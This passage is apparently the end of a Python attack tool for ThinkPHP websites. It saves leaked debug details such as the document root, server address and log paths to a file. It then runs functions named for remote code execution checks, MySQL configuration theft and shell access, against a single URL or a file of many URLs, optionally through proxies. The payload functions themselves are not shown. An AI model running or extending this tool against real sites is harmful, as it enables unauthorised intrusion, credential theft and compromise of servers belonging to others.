'DOCUMENT_ROOT': 401 | fo.write('DOCUMENT ROOT: {}\n'.format(j.small.text.strip())) 402 | print("\033[1;32m[+] DOCUMENT ROOT: {}\033[0m".format(j.small.text.strip())) 403 | if j.strong.text == 'SERVER_ADDR': 404 | fo.write('SERVER ADDR: {}\n'.format(j.small.text.strip())) 405 | print("\033[1;32m[+] SERVER ADDR: {}\033[0m".format(j.small.text.strip())) 406 | if j.strong.text == 'LOG_PATH': 407 | fo.write('LOG PATH: {}\n'.format(j.small.text.strip())) 408 | print("\033[1;32m[+] LOG PATH: {}\033[0m".format(j.small.text.strip())) 409 | elif div_html_3 and div_html_3_path: 410 | fo.write('ThinkPHP Version: {}\n'.format(div_html_3.text)) 411 | fo.write('ThinkPHP Path: {}\n'.format(div_html_3_path[0].p.text)) 412 | print("\033[1;32m[+] ThinkPHP Version: {}\033[0m".format(div_html_3.text)) 413 | print("\033[1;32m[+] ThinkPHP Path: {}\033[0m".format(div_html_3_path[0].p.text)) 414 | fo.close() 415 | 416 | 417 | def check_host(host): 418 | if not host.startswith("http"): 419 | print('\033[1;31m[x] ERROR: Host "{}" should start with http or https\n\033[0m'.format(host)) 420 | return False 421 | else: 422 | return True 423 | 424 | 425 | if __name__ == "__main__": 426 | parser = argparse.ArgumentParser(description='Thinkphp Scan') 427 | parser.add_argument( 428 | "-u", "--url", help='Start scanning url -u xxx.com') 429 | parser.add_argument("-f", "--file", help='read the url from the file') 430 | parser.add_argument("-p", "--proxy", help='use HTTP/HTTPS proxy') 431 | parser.add_argument("--shell", help='try to get shell', action='store_true') 432 | args = parser.parse_args() 433 | if args.url and check_host(args.url): 434 | if args.proxy: 435 | fo = open(args.proxy,'r') 436 | proxy = fo.readlines() 437 | fo.close() 438 | else: 439 | proxy = False 440 | print("\033[1;34m[!][!][!] {} Start\033[0m".format(args.url)) 441 | log_find(args.url) 442 | check_dubug(args.url) 443 | try: 444 | think_rce_check(args.url, proxy) 445 | except: 446 | pass 447 | get_mysql_conf(args.url) 448 | if args.shell: 449 | getshell(args.url, proxy) 450 | if args.file: 451 | f = open(args.file, "r") 452 | host = f.readlines() 453 | count = 0 454 | for i in host: 455 | if args.proxy: 456 | fo = open('proxy.txt','r') 457 | proxy = fo.readlines() 458 | fo.close() 459 | else: 460 | proxy = False 461 | url = i.strip('\n') 462 | print("\033[1;34m[!][!][!] {} Start\033[0m".format(url)) 463 | if check_host(url): 464 | log_find(url) 465 | check_dubug(url) 466 | try: 467 | think_rce_check(url, proxy) 468 | except: 469 | pass 470 | get_mysql_conf(url) 471 | if args.shell: 472 | getshell(url,proxy) 473 | count = count +1 474 | print("进度:{0}%".format(round(count * 100 / len(host))), end='\r') 475 | time.sleep(0.2) --------------------------------------------------------------------------------